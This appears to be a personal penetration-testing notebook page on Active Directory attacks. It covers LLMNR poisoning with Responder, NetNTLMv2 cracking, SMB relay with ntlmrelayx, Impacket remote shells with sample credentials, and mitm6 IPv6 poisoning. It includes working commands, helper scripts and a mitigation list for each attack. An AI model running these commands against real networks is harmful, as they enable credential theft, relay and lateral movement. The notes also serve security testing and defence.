refabr1k's Pentest Notebook
Responder / SMB Relay

Hacking Active Directory

LLMNR Poisoning

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are the fallbacks Windows uses when a name does not resolve through DNS. Anyone on the local segment can answer those multicast/broadcast queries, so Responder claims the name, the victim connects to the attacker and authenticates with an NTLMv2 challenge/response (NetNTLMv2), which is captured and cracked offline.

responder -I eth0 -rdwv

-I selects the listening interface, -r and -d answer NetBIOS wredir and domain suffix queries, -w starts the rogue WPAD proxy and -v prints the full captures (in newer Responder releases -d means DHCP instead). Captures are written under Responder's logs directory, one file per protocol and client IP.

hashcat -m 5600 hashes.txt rockyou.txt

Mode 5600 is NetNTLMv2; the captured lines go into hashes.txt exactly as Responder logged them.
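Responder logs an account's NetNTLMv2 response again every time that client re-authenticates, so the cracking input easily contains the same user dozens of times. The shell snippet below is an added example, not the notebook's own script: it keeps one capture per user and domain before the file goes to hashcat. The log path is assumed to be Responder's default logs directory under /usr/share/responder, and the sample capture lines are constructed for illustration (they are not real responses).

```shell
#!/bin/sh
# Added example: collapse Responder's NetNTLMv2 captures to one line per account.
# Lines have the hashcat -m 5600 layout: user::DOMAIN:serverchallenge:ntproofstr:blob

# Read NetNTLMv2 lines on stdin and keep the first line seen for each user@domain.
# The comparison is case-insensitive because Windows account names are. Later
# captures of the same account differ only in the challenge and add nothing
# for offline cracking, so dropping them saves hashcat time.
dedup_netntlmv2() {
    awk -F: '!seen[tolower($1 "@" $3)]++'
}

# Constructed sample: saul was captured twice (two challenges), jesse once.
# Values are placeholders, not real NTLM material.
sample_captures() {
    cat <<'EOF'
saul::ADHACKING:1122334455667788:a1b2c3d4e5f60718293a4b5c6d7e8f90:0101000000000000
SAUL::adhacking:8877665544332211:0f1e2d3c4b5a69788796a5b4c3d2e1f0:0101000000000000
jesse::ADHACKING:0102030405060708:00112233445566778899aabbccddeeff:0101000000000000
EOF
}

# Real usage (assumed Responder log location on this notebook's Kali layout):
#   cat /usr/share/responder/logs/*-NTLMv2-*.txt | dedup_netntlmv2 > hashes.txt
#   hashcat -m 5600 hashes.txt rockyou.txt
sample_captures | dedup_netntlmv2
```

Keep the raw logs as well: if a deduplicated line fails to crack, the other captures of that account are useless anyway, but the originals are still the evidence of which hosts were poisoned.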

Mitigation:

  • Disable LLMNR

    Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor > "Turn OFF Multicast Name Resolution"

  • Disable NBT-NS

    Network Connections > Network Adapter Properties > Internet Protocol Version 4 (TCP/IPv4) Properties > Advanced tab > WINS tab > select "Disable NetBIOS over TCP/IP"

If LLMNR and NBT-NS cannot be disabled:

  • Require Network Access Control, so an attacker's machine cannot join the segment and answer queries in the first place.

  • Strong user passwords of more than 14 characters that avoid dictionary words, so captured NetNTLMv2 responses do not crack.

SMB Relay

SMB signing must be disabled, or enabled but not required, on the host you relay to. The relayed user also needs local admin rights on that host for ntlmrelayx to do anything useful (its default action dumps the local SAM), and a connection cannot be relayed back to the machine it came from.

Whether a host requires signing can be checked with nessus, smbsign, nmap etc. (CrackMapExec can also write the list directly with its --gen-relay-list option). Below is an nmap scan result where signing is "enabled but not required", which means relay attacks will work against that host. Domain controllers require signing by default; workstations and member servers do not.

nmap --script=smb2-security-mode.nse -p445 192.168.42.0/24

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

Steps:

  1. Write the IP addresses of hosts that do not require signing to targets.txt, one per line.

  2. In /usr/share/responder/Responder.conf set HTTP and SMB to Off, so Responder keeps poisoning LLMNR/NBT-NS but leaves those two ports free for ntlmrelayx to listen on.

  3. Run responder -I eth0 -rdwv in one terminal and ntlmrelayx.py -tf targets.txt -smb2support in another. When a poisoned client authenticates, its NTLM session is relayed to each target in turn: with a local-admin user the default action dumps the SAM hashes, -c runs a command instead, and -i opens an interactive SMB shell on a local port.
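Turning the scan above into targets.txt, as an added example rather than the notebook's own script: the function reads nmap normal output (-oN) and prints only hosts whose smb2-security-mode result is "enabled but not required" or "disabled", which are the ones ntlmrelayx can relay to. The host names and addresses in the sample scan are constructed for illustration.

```shell
#!/bin/sh
# Added example: build ntlmrelayx's targets.txt from the normal output of
#   nmap --script=smb2-security-mode.nse -p445 -oN smb-signing.nmap 192.168.42.0/24
# Only hosts that do not require SMB signing can be relayed to.

# $1: nmap normal-output file (default: stdin). Prints one relay-able IP per line.
relay_targets() {
    awk '
        # Remember the current host. The report line is either
        # "Nmap scan report for 10.0.0.5" or "... for name (10.0.0.5)",
        # so take the last field and strip the parentheses.
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }
        # Emit the host when its smb2-security-mode result allows relaying.
        /Message signing enabled but not required/ || /Message signing disabled/ { print host }
    ' "${1:--}"
}

# Constructed sample scan: a workstation that does not require signing and a
# DC that does. Only the workstation should end up in targets.txt.
sample_scan() {
    cat <<'EOF'
Nmap scan report for 192.168.42.139
Host is up (0.00041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

Nmap scan report for dc01.adhacking.local (192.168.42.10)
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.02: 
|_    Message signing enabled and required
EOF
}

# Real usage: relay_targets smb-signing.nmap > targets.txt
sample_scan | relay_targets
```

Re-run the scan before each relay attempt rather than reusing an old list: a host that has since had signing enforced just wastes a relayed authentication, and each relay attempt is a logon event on the target.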

Mitigation:

  • Enable SMB signing on all hosts

    • pro: completely stops SMB relay attacks.

    • con: the per-packet signing adds CPU overhead, which shows up as slower file copies.

  • Disable NTLM authentication

    • pro: completely stops the attack, since there is nothing to relay.

    • con: if Kerberos stops working for a host or service, Windows falls back to NTLM, so anything that still depends on NTLM breaks or silently keeps the exposure.

  • Account tiering

    • pro: limits domain admin accounts to specific tasks, so a relayed session is rarely an admin session.

    • con: enforcing the policy may be difficult.

  • Local admin restriction

    • pro: prevents a lot of lateral movement, because a relayed user without local admin on the target cannot dump its SAM or run commands.

    • con: potentially increases the number of service desk tickets.

SMB gaining shell access

All three Impacket tools need a user with local admin rights on the target. psexec.py and smbexec.py create a service on the target (psexec.py also uploads its service binary to ADMIN$), so they are noisy and easy to detect; wmiexec.py runs commands over WMI without writing to disk and is the quietest of the three. Each accepts -hashes LM:NT in place of the password, which is what makes them usable for pass-the-hash with NTLM hashes dumped by a relay.

# Impacket
psexec.py adhacking.local/saul:Password123@192.168.42.139

# Wmiexec
wmiexec.py adhacking.local/saul:Password123@192.168.42.139

# Smbexec
smbexec.py adhacking.local/saul:Password123@192.168.42.139

# Metasploit (set RHOSTS, SMBDomain, SMBUser and SMBPass, then run)
exploit(windows/smb/psexec) > 

IPv6 Attacks

Windows prefers IPv6 over IPv4 and requests DHCPv6 configuration by default even on networks that only use IPv4. mitm6 answers those requests, hands out the attacker as the DNS server and then answers WPAD lookups, so hosts start authenticating to the attacker. The -d value must be the target domain, so that only hosts in that domain are poisoned.

mitm6 -d adhacking.local

relay attack: the resulting authentications are relayed with ntlmrelayx run with its -6 (listen on IPv6) and -wh (serve the WPAD file) options, normally to LDAP on a domain controller rather than to SMB, because LDAP signing is not required by default. Run mitm6 and ntlmrelayx together, and stop mitm6 afterwards so the poisoned hosts get their real DNS back.

Last updated 4 years ago

Reference: mitm6, https://github.com/fox-it/mitm6